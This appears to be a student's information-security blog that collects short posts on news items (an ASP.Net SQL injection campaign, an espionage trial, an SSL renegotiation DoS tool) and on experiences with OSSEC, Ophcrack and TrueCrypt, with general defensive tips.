SQL injection attack has compromised nearly 200,000 ASP.Net sites

Hackers are in the midst of a massively successful SQL injection attack targeting websites built on Microsoft’s ASP.Net platform. About 180,000 pages have been affected so far, security researchers say.

Attackers have planted malicious JavaScript on ASP.Net sites that causes the browser to load an iframe with one of two remote sites: www3.strongdefenseiz.in and www2.safetosecurity.rr.nu [1]

Fortunately, the attack will only be successful if the user uses an outdated or unpatched browser without the latest version of Adobe Reader, Flash, or Java.

In the company I worked for, the system administrator only released new updates once a month. If this is also the case for many other companies, this window of time would allow for such an attack to be successful. This is always the challenge in computer security. Simply keeping up with the latest threats is a job in and of itself.

[1] http://www.infoworld.com/d/security/massive-sql-injection-attack-has-comprised-nearly-200000-aspnet-sites-176667

Accused Chinese cyber-spy on trial for stealing Motorola secrets

A software engineer by the name of Hanjuan Jin was arrested at Chicago O’Hare International Airport, ready to depart via a one-way ticket to China. Along with $30,000, she was carrying more than 1,000 electronic and paper documents from her former employer (she had just quit Motorola) as well as Chinese documents for military telecommunications technology, according to the FBI affidavit filed in court as part of the case. [1]

However, she has pleaded not guilty. Sounds to me like she was caught red handed. According to the article, this happens with Chinese nationals quite often. In my opinion, if the United States didn’t have such weak foreign policy this wouldn’t be happening as often as it does.

[1] http://www.networkworld.com/news/2011/110711-hanjuan-jin-trial-252830.html

Attack Tool Exploits SSL Vulnerability to Create DoS Attack

“A German hacker group has released a new proof-of-concept tool for denial of service (DoS) attacks that exploits a weakness in SSL.

According to the group, known as The Hackers Choice (THC), the SSL vulnerability can be used to kick a server off the Internet.” [1]

A denial of service attack is probably the most widespread and easiest to accomplish by a novice hacker attack that is out there. It is especially popular with “hacktivist” groups like THC mentioned in the article because of the simplicity and lack of real knowledge that it requires to accomplish. There are many ways to accomplish a DoS attack, and the article addresses one such method that has been recently brought to the foreground. According to the article, establishing an SSL connection on a server requires 15 times more processing power than on the client [1]. These hackers have developed a tool to use that necessary processing power to their advantage in creating a DoS attack. Specifically, it targets SSL renegotiation. When the server doesn’t like the key, it tries to renegotiate the connection. The tool they made creates thousands of connection attempts to an SSL server on a single TCP connection, which eats up the processing power of the server and ultimately results in DoS. The group claims (and I agree) that SSL renegotiation is stupid. If you’re not happy with the key, terminate the connection and start a new one. This tool mainly targets servers that use SSL renegotiation.

One way of mitigating this tool’s effect is to disable SSL renegotation and use SSL accelerator hardware. But the group claims that even that will not stop the tool completely [1].

[1] http://www.securityweek.com/attack-tool-exploits-ssl-vulnerability-create-dos-attack

Owning a Cop Car

A security researcher named Kevin Finisterre managed to tap into the live video feed of a police cruiser camera. He was able to do this because the systems that the police department used were insecure and used protocols such as FTP and telnet. Due to some configuration error no authentication was required and Mr. Finisterre was able to stream live video from the camera of a police cruiser.

The documentation of his audit can be found at http://www.digitalmunition.com/OwningCopCar.pdf

I came across this story a while ago but it is still pretty interesting. Imagine the possibilities.

IT Security Budgets Cut

“It’s been a tumultuous decade for IT spending. In the recession that started in late 2000, many enterprises slashed IT investments wherever they could, except for IT security, which saw many businesses increase investments. Then, following the financial and mortgage meltdown, after a few years of growth, IT budgets remained flat, while investments in security and regulatory compliance initiatives still managed to remain strong.

Today, the relative strength of IT security spending compared to other aspects of IT is starting to show its age. According to the responses to this year’s CSO/CIO/PwC Global Information Security Survey, more enterprises are deferring IT security spending and cutting costs where possible. In fact, nearly half of all of those surveyed said they trimmed security costs last year. While only a slim majority, 51%, said they will increase security spending next year.” (http://www.networkworld.com/news/2011/101311-a-penny-251939.html)

Not something you really want to hear as an IT security student, am I right? IT Security is not an asset, it’s a liability. Unless you work for a place like McAfee, Symantec, or a penetration testing company, your job and what you do costs the business money that could be spent elsewhere.

The first job I ever had, my boss told me “You should always keep in mind two things: Save me money, and make me money.” Good words to live by in my opinion. The head honchos are always looking for ways to save and make money and having a huge security budget generally does not help, unless you can spin it as a selling point. For example if you’re a bank, it would be a good draw for customers to know that you have “the world’s most secure systems”.

Host-based Intrusion Detection System OSSEC

While on my co-op, I was tasked to deploy a HIDS on the servers in order to comply with the information security standard. The previous co-op student had started implementing OSSEC, which stands for Open Source Security. One of the major “selling points” was that it is freeware (GNU General Public License (version 3)). [1]

“OSSEC is a scalable, multi-platform, open source Host-based Intrusion Detection System (HIDS). It has a powerful correlation and analysis engine, integrating log analysis, file integrity checking, Windows registry monitoring, centralized policy enforcement, rootkit detection, real-time alerting and active response.” [1]

The server was relatively easy to set up (I wasn’t that comfortable with Ubuntu when I first started) and the OSSEC agent was very easy to install. First, you set up the server and create agents that have a hostname, and IP address, and an ID that you give them. Once you have the agents registered on the server, you extract the security key from the server and copy/paste from PuTTY into the OSSEC Windows agent window. After that it’s as simple as starting up the agent to begin protecting the server.

OSSEC saves daily log files in a compressed format on the server (.tar.gz if I remember correctly). These can get rather large, even when compressed, after a period of time. Luckily, our security standard only called for 3 months of record keeping.

The downside of this software is the huge number of false positives it generates. The way OSSEC rates threats is assigning a ‘level’ to the event that occurs between 0 and 15. Generally level 7 and below are harmless and levels 10 – 15 are what you want to be apprised of. Our standard however, required us to log EVERYTHING. This meant thousands of redundant WINDOWS AUDIT FAILURE events saved to the logs. There is a way to manually edit the configuration file to ignore certain event codes (like Windows Audit Failure) but again, we were required to log every single event.

It is very time consuming to read through the hundreds of pages of logs and look for threats, so I looked for log consolidation software that would help organize it better and make it more readable and I found Logwatch. Logwatch broke the logs up into sections and sent a daily email with its report. This was OK for a couple days but when I had all 8 servers reporting to the OSSEC server, the log sizes grew very large and the email server cut the attachment automatically.

I talk about the drawbacks to OSSEC because you probably won’t read about it elsewhere. You can read about its accolades at http://www.ossec.net. It did seem to do its job well.

[1] http://www.ossec.net/main/about

Ophcrack Password Cracker

We talked about passwords in class and heard Professor F tell his story about guessing people’s passwords. Well, unless you have that kind of talent for guessing, you probably don’t want to go through that frustration. On my job, my boss gave me a computer to install something on but didn’t tell me the password so I couldn’t log in to install the program. I would’ve asked him for it but he was gone from his office for an appointment for half the day. It was nothing that couldn’t have waited until he got back, but I thought I’d give a password cracking tool a shot so I could get the job done (I should mention that this was an OK thing for me to do but not for other employees). After browsing for a little while I came across Ophcrack on http://pcsupport.about.com/od/toolsofthetrade/tp/passrecovery.htm and read that it “is by far the best free Windows password recovery tool available” [1]. It uses rainbow tables to brute force guess the password. So I burned it to a LiveCD and popped it into the drive of the machine and rebooted. It ran for about 10 minutes and came up with nothing.

The downside of this software is it only works if the password you’re trying to guess is 14 characters or less and is alphanumeric. When my boss finally came back and entered the password I could tell it was longer than 14 characters and had symbols in it as well. Good on him for having a strong password but it was kind of annoying that Ophcrack didn’t work. There are rainbow tables that you can buy that use a larger charset – http://ophcrack.sourceforge.net/tables.php [2] – but we like to keep things free whenever possible. Go ahead and give it a shot if you’d like, to see if your password can be cracked. It is pretty easy to protect against this. Just make sure:

1. Your password is greater than 14 characters

2. Your password has lowercase and uppercase letters, numbers, and symbols

3. Disable booting from CDs and USB drives and use an administrative password on your BIOS.

 

References:

http://pcsupport.about.com/od/toolsofthetrade/tp/passrecovery.htm

http://ophcrack.sourceforge.net/tables.php

Quantum Computing Continues to Evolve

Although still in its infancy, quantum computing is making some impressive strides forward. [1] We aren’t computer engineering students but it is important to understand, as security conscious individuals, the implications to computer security posed by quantum computers. Namely, cryptanalysis. Cryptanalysis is basically trying to find a way to read an encrypted message without having the key. Messages are encrypted using a cipher. An example of a cipher is the RSA cipher. The strength of the cipher lies in the mathematical algorithm (trapdoor function) used to create the keys, the key size, and the limited computational power available to potential attackers. The cipher creates the key with 2 VERY large prime numbers (the larger the better). If the attacker wants to read the message, he has to factor the product of those 2 prime numbers. Prime factorization is the biggest threat to a cipher like RSA or the Rabin cryptosystem. Using computers available today, it could take years upon years to crack such a message. However, with the computing power of quantum computers, such a calculation will be trivial.

From Wikipedia:

“Consider a problem that has these four properties:

1. The only way to solve it is to guess answers repeatedly and check them,
2. The number of possible answers to check is the same as the number of inputs,
3. Every possible answer takes the same amount of time to check, and
4. There are no clues about which answers might be better: generating possibilities randomly is just as good as checking them in some special order.

An example of this is a password cracker that attempts to guess the password for an encrypted file (assuming that the password has a maximum possible length).

For problems with all four properties, the time for a quantum computer to solve this will be proportional to the square root of the number of inputs. That can be a very large speedup, reducing some problems from years to seconds.” [2]

So who knows? In a decade, the cryptosystems considered strong today like AES may be totally useless (much like what happened to WEP).

References:

[1] http://www.sciencedaily.com/releases/2011/08/110831115808.htm

[2] http://en.wikipedia.org/wiki/Quantum_computer#Potential

Protect Your Hard Drive

While on co-op I was tasked to encrypt the hard drives of the company laptops. The newer laptops with Windows 7 already had BitLocker but we wanted something flexible and preferably open-source to use for all operating systems. TrueCrypt matched the requirements very well. It has several encryption algorithms to choose from: AES, Serpent, Twofish, AES-Twofish, AES-Twofish-Serpent, Serpent-AES, Serpent-Twofish-AES, and Twofish-Serpent. It uses 256-bit key sizes and 128-bit block sizes. TrueCrypt uses RIPEMD-160 by default, but you can also use the SHA-512 and Whirlpool hash algorithms to create the HMAC. If you are wondering how secure it is take a moment to read about Operation Satyagraha.

In 2008, a Brazilian banker (who had his hard drives encrypted with TrueCrypt) suspected of fraud was arrested. His hard drives were examined by the Brazilian National Institute of Criminology (INC) for months until they asked the US Government for help in cracking the drives. The FBI used dictionary attacks for an entire year before throwing in the towel and giving them back to the Brazilian government. So to the ultra paranoid: If the FBI couldn’t crack TrueCrypt, you know it’s good. There is no back door for TrueCrypt and the creators are anonymous. Even if the government subpoenaed TrueCrypt’s creators to crack the password on a hard drive for a high profile case, there would be nothing they could do.

Using it is easy. Just download and install it from http://www.truecrypt.org. Then follow the instructions on their website. When you encrypt your hard drive, you should create a “rescue disc” in the event that you forget your password. You will need to remember your password because if you forget it and you don’t have that rescue disc, good luck trying to access your data. Every time you boot your machine, you will need to enter your password.

TrueCrypt will do its job at encrypting your data and keeping it safe from prying eyes when you’re not around. But like the cartoon on Professor F’s lecture slide shows, if someone really wants your password, they will bludgeon you with a pipe until you spill your guts (figuratively or literally).

TrueCrypt: http://www.truecrypt.org/

Operation Satyagraha: http://en.wikipedia.org/wiki/TrueCrypt#Operation_Satyagraha

BitLocker vs TrueCrypt: http://www.tomshardware.com/reviews/bitlocker-truecrypt-encryption,2587.html

There are pros and cons to both BitLocker and TrueCrypt but while at my job I decided TrueCrypt was the way to go. I just thought I’d bring this software to everyone’s attention if they haven’t heard of it already.